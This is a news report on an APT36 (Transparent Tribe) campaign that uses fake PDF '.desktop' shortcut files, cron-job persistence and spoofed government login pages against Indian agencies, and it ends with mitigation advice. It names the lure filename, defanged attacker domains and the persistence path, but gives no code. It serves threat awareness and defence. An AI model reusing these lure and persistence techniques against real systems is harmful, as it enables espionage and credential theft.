A Pakistan-linked hacking group known as Transparent Tribe (APT36) is once again in the spotlight for launching a fresh cyberattack campaign against Indian government institutions.
Researchers at cybersecurity firm CYFIRMA have uncovered a new cyber-espionage campaign aimed at Indian government agencies, wherein attackers disguise malicious desktop shortcut files as harmless PDF documents to secretly install malware in the background.
How The Attack Works
According to CYFIRMA, the campaign begins with phishing emails that appear to carry official meeting invitations with a file named something like โMeeting_Ltr_ID1543ops.pdf.desktopโ. Instead of opening a PDF, victims who click on the attached file that appears like a harmless document unknowingly run a malicious shortcut file that installs spyware in the background.
The file downloads a malware payload from attacker-controlled servers like such as securestore[.]cv and modgovindia[.]space, and installs it in the background. To avoid suspicion, a decoy PDF hosted on Google Drive opens in Firefox, tricking the victim too believing that they have simply opened a meeting document.
Once inside the system, the malware โ written in the Go programming language can steal sensitive data, harvest login credentials, enable long-term access, and remain active even after a reboot by setting up automated tasks.
“APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls,” CYFIRMA wrote in a research blog post.
Unlike earlier operations, this campaign specifically tailors attacks to Indiaโs Linux-based systems, such as BOSS (Bharat Operating System Solutions) โ a government-backed OS, in addition to Windows systems.
To maintain persistence, the malware adds a cron job that runs the hidden payload โ.config/systemd/systemd-updateโ every time the system reboots, ensuring it remains active even after shutdowns or process termination.
Since BOSS is widely used in government departments, this dual-platform targeting increases the hackersโ chances of success.
Why This Matters
Security experts warn that Transparent Tribeโs evolving tactics have now shifted from its traditional use of Windows malware to developing threats aimed at Linux BOSS.
โThe adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the groupโs intent to diversify access vectors and ensure persistence even in hardened environments,โ CYFIRMA said.
Adding to the danger, the group is also running credential-harvesting sites that mimic Indian government portals. Fake login pages trick victims into handing over their email, password, and even Kavach two-factor authentication (2FA) codes โ a security measure used by Indian agencies since 2022. By bypassing this security layer, the attackers gain complete access to sensitive accounts.
Long-Term Threatย
Transparent Tribe, believed to be operating out of Pakistan, has been active for over a decade, regularly targeting the Indian government, defense, and critical infrastructure organizations. Their tactics have steadily evolved โ from simple Windows-based malware to highly tailored Linux backdoors and credential theft schemes across South Asia.
Recommendations & Mitigation
Security researchers are advising government employees to handle email attachments and login pages with caution, as disguised PDFs and fake portals are being used to trick users into giving up their credentials.
To counter APT36โs campaign targeting Indian government entities through weaponized .desktop files, agencies are recommended to deploy strong email security, conduct regular user training, and harden BOSS Linux with least-privilege controls. Endpoint detection, network monitoring, and integration of IOCs/YARA rules will help early detection, while timely patching and behavior-based controls are vital to block suspicious activity.
The Bigger Picture
The incident underscores the national security risks posed by APT groups targeting government infrastructure. If successful, such attacks could lead to the theft of classified data, disruptions in critical operations, and enable long-term surveillance of Indian agencies. As Transparent Tribe continues to evolve its methods, India faces a growing challenge in defending sensitive infrastructure from cyber-espionage.
